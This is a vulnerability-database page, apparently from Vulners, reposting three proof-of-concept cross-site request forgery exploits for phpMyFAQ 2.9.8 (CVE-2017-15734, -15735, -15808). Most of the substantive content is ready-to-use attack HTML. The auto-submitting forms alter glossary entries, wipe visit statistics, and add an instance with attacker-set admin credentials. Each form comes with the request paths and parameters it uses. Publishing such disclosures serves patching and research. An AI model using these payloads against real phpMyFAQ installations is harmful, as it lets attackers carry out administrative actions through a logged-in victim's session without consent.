Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

๐Ÿ“„ phpMyFAQ 2.9.8 Cross Site Request Forgery

๐Ÿ—“๏ธย 04 Dec 2025ย 00:00:00Reported byย CodeSecLabTypeย 
packetstorm
ย packetstorm๐Ÿ”—ย packetstorm.news๐Ÿ‘ย 239ย Views

phpMyFAQ 2.9.8 has a CSRF flaw allowing glossary updates without a token; patch adds validation.

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2017-15734
4 Dec 202521:02
โ€“circl
Circl		CVE-2017-15735
4 Dec 202521:02
โ€“circl
Circl		CVE-2017-15808
16 Apr 202514:56
โ€“circl
CNVD		phpMyFAQ cross-site request forgery vulnerability (CNVD-2017-32428)
23 Oct 201700:00
โ€“cnvd
CNVD		phpMyFAQ cross-site request forgery vulnerability (CNVD-2017-33499)
23 Oct 201700:00
โ€“cnvd
CNVD		Cross-site request forgery vulnerability in phpMyFaq admin/ajax.config.php file
24 Oct 201700:00
โ€“cnvd
CVE		CVE-2017-15734
21 Oct 201722:00
โ€“cve
CVE		CVE-2017-15735
21 Oct 201722:00
โ€“cve
CVE		CVE-2017-15808
23 Oct 201717:00
โ€“cve
Cvelist		CVE-2017-15734
21 Oct 201722:00
โ€“cvelist
Rows per page
# Exploit Title: phpMyFAQ  2.9.8 Cross-Site Request Forgery (CSRF)
    # Date: 2024-10-26
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/thorsten/phpMyFAQ
    # Software Link: https://github.com/thorsten/phpMyFAQ
    # Version: 2.9.8 
    # Tested on: Ubuntu Windows
    # CVE : CVE-2017-15735
    
    PoC: 
    While still logged in, open another browser window: 
    <html>
       <body>
          <form action="http://phpmyfaq/admin/index.php?action=updateglossary" method="POST">
             <input type="hidden" name="id" value="1">
             <input type="hidden" name="item" value="Malicious Glossary Item">
             <input type="hidden" name="definition" value="This is a malicious definition.">
             <input type="submit" value="Submit request">
          </form>
          <script>
             document.forms[0].submit();
          </script>
       </body>
    </html>
    
    Some Details:
    {
        "Protection Mechanisms Before Patch": "There was no CSRF token validation in place for the glossary modification actions (add, update, delete). The patch introduced CSRF token checks for both POST and GET requests to ensure that only authorized sessions could perform these actions.",
        "File Navigation Chain": "Public Access Entry URL -> phpmyfaq/admin/index.php -> glossary.main.php -> glossary.edit.php",
        "Execution Path Constraints": "The user must be authenticated with the necessary permissions ('editglossary') to reach and interact with the glossary functionality through the 'index.php' entry point. Without proper authentication, the server redirects to the login form.",
        "Request Parameters": "id, item, definition",
        "Request Method": "POST",
        "Request URL": "http://phpmyfaq/admin/index.php?action=updateglossary",
        "Final PoC": "```\n<html>\n   <body>\n      <form action=\"http://phpmyfaq/admin/index.php?action=updateglossary\" method=\"POST\">\n         <input type=\"hidden\" name=\"id\" value=\"1\">\n         <input type=\"hidden\" name=\"item\" value=\"Malicious Glossary Item\">\n         <input type=\"hidden\" name=\"definition\" value=\"This is a malicious definition.\">\n         <input type=\"submit\" value=\"Submit request\">\n      </form>\n      <script>document.forms[0].submit();</script>\n   </body>\n</html>\n```"
    }
    
    
    
    ------
    
    # Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF) 
    # Date: 2024-10-26
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/thorsten/phpMyFAQ
    # Software Link: https://github.com/thorsten/phpMyFAQ
    # Version: 2.9.8
    # Tested on: Ubuntu Windows
    # CVE : CVE-2017-15734
    
    PoC: 
    Get http://phpmyfaq/admin/index.php?action=clear-visits
    Reproduction: While still logged in, open another browser window to access the link.
    
    Some Details:
    {
        "Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.",
        "File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php",
        "Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.",
        "Request Parameters": "action=clear-visits",
        "Request Method": "GET",
        "Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits",
        "Final PoC": "<html>\n  <body>\n    <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n      <input type=\"submit\" value=\"Submit request\">\n    </form>\n    <script>\n      document.forms[0].submit();\n    </script>\n  </body>\n</html>"
    }
    
    
    
    -----
    
    # Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
    # Date: 2025-11-25
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
    # Software Link: https://github.com/thorsten/phpMyFAQ/
    # Version: 2.9.8
    # Tested on: Windows 10
    # CVE : CVE-2017-15808
    
    
    PoC: 
    <html>
      <body>
        <form action="http://phpmyfaq/admin/index.php" method="GET">
          <input type="hidden" name="action" value="ajax">
          <input type="hidden" name="ajax" value="config">
          <input type="hidden" name="ajaxaction" value="add_instance">
          <input type="hidden" name="url" value="malicious">
          <input type="hidden" name="instance" value="malicious_instance">
          <input type="hidden" name="comment" value="CSRF Test">
          <input type="hidden" name="email" value="[email protected]">
          <input type="hidden" name="admin" value="attacker">
          <input type="hidden" name="password" value="password123">
          <input type="submit" value="Submit request">
        </form>
        <script>
          document.forms[0].submit();
        </script>
      </body>
    </html>
    
    Steps to Reproduce:
    1. Save the following code as poc.html.
    2. Log in phpmyfaq, and open the file in the same browser.
    3. The outcome will occur.

Data

Build on a solid foundation withย Vulners data

Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data

Api

Power your application withย Vulners API

The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access

App

Assess and manage vulnerabilities withย Vulnersย tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Dec 2025 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 26.8
CVSS 38.8
EPSS0.00344
phpmyfaqglossary updatetoken validationcross site forgeryvulnerability
239